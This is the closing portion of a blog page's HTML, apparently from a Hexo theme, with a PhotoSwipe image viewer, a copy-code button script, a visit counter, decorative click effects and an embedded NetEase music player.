                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->


<script src="/js/clickLove.js"></script>


<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="52"
        src="//music.163.com/outchain/player?type=2&id=264731930&auto=0&height=32"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
  </div>
  <!--浏览器搞笑标题-->
<script type="text/javascript" src="/js/Funnytitle.js"></script>

</body>

</html>